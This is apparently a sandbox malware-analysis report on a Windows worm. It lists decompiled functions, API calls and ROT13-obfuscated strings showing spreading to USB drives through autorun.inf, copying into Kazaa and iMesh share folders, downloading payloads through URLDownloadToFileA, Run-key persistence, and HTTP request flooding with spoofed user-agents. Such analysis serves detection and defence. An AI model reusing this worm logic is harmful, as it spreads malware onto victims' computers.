Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon), xrefs: 00406A61
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729), xrefs: 00406A6B
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1), xrefs: 00406A89
Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1, xrefs: 00406A7F
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322), xrefs: 00406A75
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 00406A57
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0), xrefs: 00406AA7

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ConnectCountSleepSocketTickclosesockethtonsrandsendsrandwsprintf
String ID: GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*$Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)$Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)$Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1
API String ID: 336679807-801071570
Opcode ID: e53b55a620a33dde3b4b694c48138350b48f0f36ad9310f433b1ee46dc230097
Instruction ID: 5cdc0710ae53c098c5dd65590a42bc470b49e3f5e350015ac0ed1cf0fb49e237
Opcode Fuzzy Hash: e53b55a620a33dde3b4b694c48138350b48f0f36ad9310f433b1ee46dc230097
Instruction Fuzzy Hash: D83141F49047148BCB20DF29C58428DBBF0EF85314F1085AEE558AB392D7789A95CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 004068A0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 81
stringsleepfileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004068A0() {
				void* _v16;
				char _v188;
				char _v220;
				char _v348;
				char _v349;
				char _v380;
				void _v476;
				intOrPtr _v484;
				int _v488;
				void* _v492;
				int _t40;
				CHAR* _t42;
				void* _t47;
				signed int _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void** _t55;
				intOrPtr* _t56;

				memcpy( &_v476, 0x40d460, 0x60);
				E00404C38( &_v380, "nhgbeha.vas");
				_v488 = "fngbeanf.qyy";
				_t47 =  &_v220;
				_v492 = _t47;
				E00404C38();
				_v484 = _t47;
				_v488 = 0x96;
				_v492 =  &_v188;
				E00404620();
				if(E00404ED6( &_v188) != 0) {
					_t50 =  &_v348;
					while(1) {
						Sleep(0x1770);
						_t54 = _t53 - 4;
						_t49 = 0;
						do {
							_t40 = GetDriveTypeA( *(_t52 + _t49 * 4 - 0x1d8));
							_t54 = _t54 - 4;
							if(_t40 == 2) {
								_t51 =  &_v348;
								memset(_t51, 0, 0x78);
								_t42 =  *(_t52 + _t49 * 4 - 0x1d8);
								_v488 = _t42;
								_v492 = _t51;
								L0040C208();
								_v492 = _t51;
								L0040C310();
								_t55 = _t54 - 4;
								if(_t42[(char*)( &_v349)] != 0x5c) {
									_v492 = 0x412935;
									 *_t55 = _t51;
									L0040C328();
									_t55 = _t55 - 8;
								}
								_v492 =  &_v380;
								 *_t55 = _t50;
								L0040C208();
								 *_t55 = 1;
								SetErrorMode(??);
								_t56 = _t55 - 4;
								_v488 = 0;
								_v492 = _t50;
								 *_t56 =  &_v188;
								CopyFileA(??, ??, ??);
								_t54 = _t56 - 0xc;
							}
							_t49 = 1 + _t49;
						} while (_t49 <= 0x17);
					}
				}
				return 0;
			}

APIs

memcpy.MSVCRT ref: 004068C5

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB

Sleep.KERNEL32 ref: 0040692D
GetDriveTypeA.KERNEL32 ref: 00406944
memset.MSVCRT ref: 0040696E
_mbscat.MSVCRT ref: 00406981
lstrlen.KERNEL32 ref: 00406989
lstrcat.KERNEL32 ref: 004069A6
_mbscat.MSVCRT ref: 004069BB
SetErrorMode.KERNEL32 ref: 004069C7
CopyFileA.KERNEL32 ref: 004069E4

Strings

x, xrefs: 0040695B
fngbeanf.qyy, xrefs: 004068E0
nhgbeha.vas, xrefs: 004068CA

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$_mbscatlstrlenmemset$CopyDirectoryDriveErrorFileModeSleepSystemTypefclosefopenmemcpy
String ID: fngbeanf.qyy$nhgbeha.vas$x
API String ID: 1674407683-3747760128
Opcode ID: 84151a140f1e5fa0085d5774543a83b656e69c0a109d3cbe9b508c1ff952e0c4
Instruction ID: ef6cf4129608155cc112f4a97fe144a2978ba8a5c429c4c3aaf2c51783ef7b88
Opcode Fuzzy Hash: 84151a140f1e5fa0085d5774543a83b656e69c0a109d3cbe9b508c1ff952e0c4
Instruction Fuzzy Hash: 01313BB0808704DAD710BF65D58539EBBF4AF84318F41897EE8C867282D77C9598CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00403390 Relevance: 21.2, APIs: 14, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 004033D2
GetFileSize.KERNEL32 ref: 00403409
CreateFileMappingA.KERNEL32 ref: 00403448
CloseHandle.KERNEL32 ref: 0040346E
MapViewOfFile.KERNEL32 ref: 004034A9
CloseHandle.KERNEL32 ref: 004034C0
CloseHandle.KERNEL32 ref: 004034D1

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 64beccc6f6e1811926c309a9acaa175bb040272e9c324b493b73e6d9ca74493c
Instruction ID: 986d351c7ed07d29ba8de43e54e9a7d5c311c5fefbca7bada34d70547d36c5f0
Opcode Fuzzy Hash: 64beccc6f6e1811926c309a9acaa175bb040272e9c324b493b73e6d9ca74493c
Instruction Fuzzy Hash: 0F513FB59043059BDB10AF25C99535EBFF4AF81348F1089AEE488673C1D779DA88CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00405850 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111stringregistryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 004058F5
RegQueryValueExA.ADVAPI32 ref: 0040593C
RegCloseKey.ADVAPI32 ref: 00405955
lstrlen.KERNEL32 ref: 0040596D
lstrlen.KERNEL32 ref: 00405982
lstrlen.KERNEL32 ref: 0040599B
lstrcat.KERNEL32 ref: 004059B8
lstrcpy.KERNEL32 ref: 004059EC
lstrcat.KERNEL32 ref: 00405A02
CopyFileA.KERNEL32 ref: 00405A19

Strings

QyQve0, xrefs: 00405885
Fbsgjner\Xnmnn\Genafsre, xrefs: 0040586F

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
String ID: Fbsgjner\Xnmnn\Genafsre$QyQve0
API String ID: 3255004976-3635034446
Opcode ID: 77ff702613bd2978c6546c697ad05210d843fe780aaedd06882f4884a381cac5
Instruction ID: afcb269cad9b4d3002b0b3817e33f6dff803cc776bda76573fbb9b1efc1f5d05
Opcode Fuzzy Hash: 77ff702613bd2978c6546c697ad05210d843fe780aaedd06882f4884a381cac5
Instruction Fuzzy Hash: 0751FBB4D05718DBDB50EF24C58939EBBF0AF44304F4189BED88867381D7789A888F96

Uniqueness

Uniqueness Score: -1.00%

Function 00405A3E Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111stringregistryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00405AE3
RegQueryValueExA.ADVAPI32 ref: 00405B2A
RegCloseKey.ADVAPI32 ref: 00405B43
lstrlen.KERNEL32 ref: 00405B5B
lstrlen.KERNEL32 ref: 00405B70
lstrlen.KERNEL32 ref: 00405B89
lstrcat.KERNEL32 ref: 00405BA6
lstrcpy.KERNEL32 ref: 00405BDA
lstrcat.KERNEL32 ref: 00405BF0
CopyFileA.KERNEL32 ref: 00405C07

Strings

QbjaybnqQve, xrefs: 00405A73
Fbsgjner\vZrfu\Trareny, xrefs: 00405A5D

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
String ID: Fbsgjner\vZrfu\Trareny$QbjaybnqQve
API String ID: 3255004976-427315093
Opcode ID: f4dee5593495d302061cee7d5c0959bbdce22457aa1a021a13ccdf22a674c199
Instruction ID: 4c2f52c761e00ed0f591be26c1bd4671a41acc1e7387a317ba9ae8b83013203e
Opcode Fuzzy Hash: f4dee5593495d302061cee7d5c0959bbdce22457aa1a021a13ccdf22a674c199
Instruction Fuzzy Hash: D051FCB4905718CEDB60EF24C58939EBBF4AF44304F4185BEDC8867381D7789A888F96

Uniqueness

Uniqueness Score: -1.00%

Function 004017F8 Relevance: 19.6, APIs: 13, Instructions: 108
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E004017F8(signed int __edx, CHAR* _a4, intOrPtr* _a8) {
				void* _v16;
				DWORD* _v20;
				signed int _v24;
				signed int _v28;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				signed int _v52;
				DWORD* _v56;
				signed int _v60;
				DWORD* _v64;
				signed int _t50;
				void* _t54;
				void* _t55;
				int _t58;
				DWORD* _t62;
				void* _t65;
				void* _t68;
				DWORD* _t73;
				signed int _t74;
				void* _t86;
				DWORD* _t88;
				void* _t89;
				void* _t90;
				void** _t92;
				void** _t93;
				void** _t94;

				_t74 = __edx;
				_v20 = 0;
				_t50 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0xa7, 0);
				_t90 = _t89 - 0x1c;
				_t86 = _t50;
				_t73 = 0;
				if((_t74 & 0xffffff00 | _t50 == 0xffffffff | _t50 & 0xffffff00 | _t50 == 0x00000000) == 0) {
					_v24 = GetFileSize(_t86, 0);
					_t54 = GetProcessHeap();
					_v52 = _v24;
					_v56 = 0;
					_t55 = RtlAllocateHeap(_t54);
					_t92 = _t90 - 0xfffffffffffffffc;
					_v28 = _t55;
					if(_t55 != 0) {
						_v52 = 0;
						_v56 =  &_v20;
						_v60 = _v24;
						_v64 = _v28;
						 *_t92 = _t86;
						_t58 = ReadFile(??, ??, ??, ??, ??);
						_t93 = _t92 - 0x14;
						if(_t58 != 0) {
							_t88 = 1 + ((0xb + _v24 * 4) * 0xaaaaaaab >> 0x20 >> 3) * 4;
							_v64 = _t88;
							 *_t93 = 0x40;
							_t62 = GlobalAlloc(??, ??);
							_t94 = _t93 - 8;
							_v56 = _t88;
							_v60 = _t62;
							_v64 = _v24;
							 *_t94 = _v28;
							 *_a8 = E00401996(_v28, _v24);
							_t65 = GetProcessHeap();
							_v60 = _v28;
							_v64 = 0;
							 *_t94 = _t65;
							HeapFree(??, ??, ??);
							 *(_t94 - 0xc) = _t86;
							CloseHandle(??);
							_t73 = _t62;
						} else {
							_t68 = GetProcessHeap();
							_v60 = _v28;
							_v64 = 0;
							 *_t93 = _t68;
							HeapFree(??, ??, ??);
							 *(_t93 - 0xc) = _t86;
							CloseHandle(??);
							_t73 = 0;
						}
					} else {
						 *_t92 = _t86;
						CloseHandle(??);
						_t73 = 0;
					}
				}
				return _t73;
			}

APIs

CreateFileA.KERNEL32 ref: 0040183E
GetFileSize.KERNEL32 ref: 0040186B
GetProcessHeap.KERNEL32 ref: 00401876
RtlAllocateHeap.NTDLL ref: 0040188D
CloseHandle.KERNEL32 ref: 0040189F
ReadFile.KERNEL32 ref: 004018D1
GetProcessHeap.KERNEL32 ref: 004018DD
HeapFree.KERNEL32 ref: 004018F4
CloseHandle.KERNEL32 ref: 004018FF

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Heap$File$CloseHandleProcess$AllocateCreateFreeReadSize
String ID:
API String ID: 1447158257-0
Opcode ID: 24885dd36752065bb9067512dd52856c7f9770a372319146a230e3d3ab931db9
Instruction ID: 56d12447d5e111c6f88c9cc84d084cd75ca963f9ae61866c417ed6db83e02629
Opcode Fuzzy Hash: 24885dd36752065bb9067512dd52856c7f9770a372319146a230e3d3ab931db9
Instruction Fuzzy Hash: 614119B1904705DBD700EFA9C18536EBFF0AF84304F108A3EE884A7791D7799949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004054F2 Relevance: 18.1, APIs: 12, Instructions: 107filesleepCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00405531

Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 00404FD9
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FE1
Part of subcall function 00404F82: srand.MSVCRT ref: 00404FE9
Part of subcall function 00404F82: rand.MSVCRT ref: 00404FF2
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FF9
Part of subcall function 00404F82: srand.MSVCRT ref: 00405001
Part of subcall function 00404F82: rand.MSVCRT ref: 0040500D
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405026
Part of subcall function 00404F82: srand.MSVCRT ref: 0040502E
Part of subcall function 00404F82: rand.MSVCRT ref: 00405033
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040504E
Part of subcall function 00404F82: srand.MSVCRT ref: 00405056
Part of subcall function 00404F82: rand.MSVCRT ref: 0040505B
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405076
Part of subcall function 00404F82: srand.MSVCRT ref: 0040507E
Part of subcall function 00404F82: rand.MSVCRT ref: 00405083
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040509E
Part of subcall function 00404F82: srand.MSVCRT ref: 004050A6
Part of subcall function 00404F82: rand.MSVCRT ref: 004050AB
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 004050C6
Part of subcall function 00404F82: srand.MSVCRT ref: 004050CE
Part of subcall function 00404F82: rand.MSVCRT ref: 004050D3
Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 004050E5
Part of subcall function 00404F82: _itoa.MSVCRT ref: 00405102
Part of subcall function 00404F82: rand.MSVCRT ref: 00405107

SetFilePointer.KERNEL32 ref: 00405574
WriteFile.KERNEL32 ref: 0040559A
Sleep.KERNEL32 ref: 004055A9

Part of subcall function 00404F82: rand.MSVCRT ref: 0040513A
Part of subcall function 00404F82: rand.MSVCRT ref: 00405168
Part of subcall function 00404F82: rand.MSVCRT ref: 00405196
Part of subcall function 00404F82: rand.MSVCRT ref: 004051C0
Part of subcall function 00404F82: rand.MSVCRT ref: 004051EF

SetFilePointer.KERNEL32 ref: 004055D4
WriteFile.KERNEL32 ref: 004055FA
Sleep.KERNEL32 ref: 00405609
SetFilePointer.KERNEL32 ref: 00405634
WriteFile.KERNEL32 ref: 0040565A
SetFilePointer.KERNEL32 ref: 0040567D
WriteFile.KERNEL32 ref: 004056AF
CloseHandle.KERNEL32 ref: 004056C0

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: rand$File$CountTicksrand$PointerWrite$LocalSleepTime$CloseCreateHandle_itoa
String ID:
API String ID: 3159365393-0
Opcode ID: 066013087a80cab26094ee465325437960832ad52aa8e7df595e92265ce101e2
Instruction ID: 8e21804255f859d75eeaefc39514b6d8a1434258e14ca154f06cca4555a00953
Opcode Fuzzy Hash: 066013087a80cab26094ee465325437960832ad52aa8e7df595e92265ce101e2
Instruction Fuzzy Hash: 0341A5B14087019AD700BF29C19935FBFF4BB84358F51892EE8986B282D7798249CF97

Uniqueness

Uniqueness Score: -1.00%

Function 00406E1C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58librarysleepfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00406E5C
GetProcAddress.KERNEL32 ref: 00406E79
FreeLibrary.KERNEL32 ref: 00406E8D
DeleteFileA.KERNEL32 ref: 00406EBD
Sleep.KERNEL32 ref: 00406F01

Strings

urlmon.dll, xrefs: 00406E55
URLDownloadToFileA, xrefs: 00406E6E
donzx.dll, xrefs: 00406E9C

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Library$AddressDeleteFileFreeLoadProcSleep
String ID: URLDownloadToFileA$donzx.dll$urlmon.dll
API String ID: 1591209584-4102153241
Opcode ID: d2cece4bf220631d5255bb3a3bc421052235e9765dea7943dbc3daf99a82a526
Instruction ID: 543b2787c70849a237c7d5d5e8862ee058c6e2dedd7614c5b7d168295bf2944d
Opcode Fuzzy Hash: d2cece4bf220631d5255bb3a3bc421052235e9765dea7943dbc3daf99a82a526
Instruction Fuzzy Hash: 1C21FCB09043459BD700EF39D58579ABBF0BB48304F108A7EE98997341E778D998CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBA Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402BCE
lstrcat.KERNEL32 ref: 00402BE8

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402C20
lstrcat.KERNEL32 ref: 00402C42
lstrcat.KERNEL32 ref: 00402C67
lstrcat.KERNEL32 ref: 00402C91
lstrcat.KERNEL32 ref: 00402CB3
lstrcat.KERNEL32 ref: 00402CD8

Strings

mvcsvnd.qyy, xrefs: 00402CE0

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$CountTickrandsrand
String ID: mvcsvnd.qyy
API String ID: 2629717045-1605320677
Opcode ID: f7e63bccf500b5fcbf6288392c2748b687ca740bfdce1b409f481ce8bf1a05ec
Instruction ID: 3c31970993b76fcb6f62e82551040ecc98f125b31847a965db22ab4f080a2362
Opcode Fuzzy Hash: f7e63bccf500b5fcbf6288392c2748b687ca740bfdce1b409f481ce8bf1a05ec
Instruction Fuzzy Hash: F441FBB59043048BCB10BF65D98569DBBF0BF84314F40897FE584A7381EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00405776 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00405796
CreateProcessA.KERNEL32 ref: 004057F8
WaitForSingleObject.KERNEL32 ref: 0040581D
CloseHandle.KERNEL32 ref: 0040582B
CloseHandle.KERNEL32 ref: 00405839

Strings

D, xrefs: 00405783
D, xrefs: 0040579B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: CloseHandle$CreateObjectProcessSingleWaitmemset
String ID: D$D
API String ID: 1209732917-143366177
Opcode ID: 8b0318b66af052caa6544f8935669438fa84808f2f8ff7b8a7a656b73dd8d3b3
Instruction ID: a424a9ca423c88ebceb4bf93d4a85606f6dbc14dab7ded7620f51e0c80248426
Opcode Fuzzy Hash: 8b0318b66af052caa6544f8935669438fa84808f2f8ff7b8a7a656b73dd8d3b3
Instruction Fuzzy Hash: 1D11A4B0904305DBEB00EF69C58935EBBF0BB44318F008A2DE894AB281D3799588CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00405256 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00405272

Strings

Unk, xrefs: 0040530F
fWinS, xrefs: 00405301
fXp, xrefs: 004052BC
fVISta, xrefs: 004052EA
f2000, xrefs: 004052A5
f2003, xrefs: 004052D3

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Version
String ID: Unk$f2000$f2003$fVISta$fWinS$fXp
API String ID: 1889659487-2404033052
Opcode ID: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
Instruction ID: e8bb7547553301c142e519b247f3baff17d1b23cd464d4725f64abea95698485
Opcode Fuzzy Hash: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
Instruction Fuzzy Hash: DD118334A11718CACF34AA18891939B72B0EB93349F4441FBD88979690C3B98DC9CE1B

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

CreateFileA.KERNEL32 ref: 00405E5E
ExitProcess.KERNEL32 ref: 00405E7E
CloseHandle.KERNEL32 ref: 00405E9E

Strings

pgszra.rkr, xrefs: 00405DCF, 00405E15
user32.dll, xrefs: 00405EB4
Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha, xrefs: 00405DFF

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
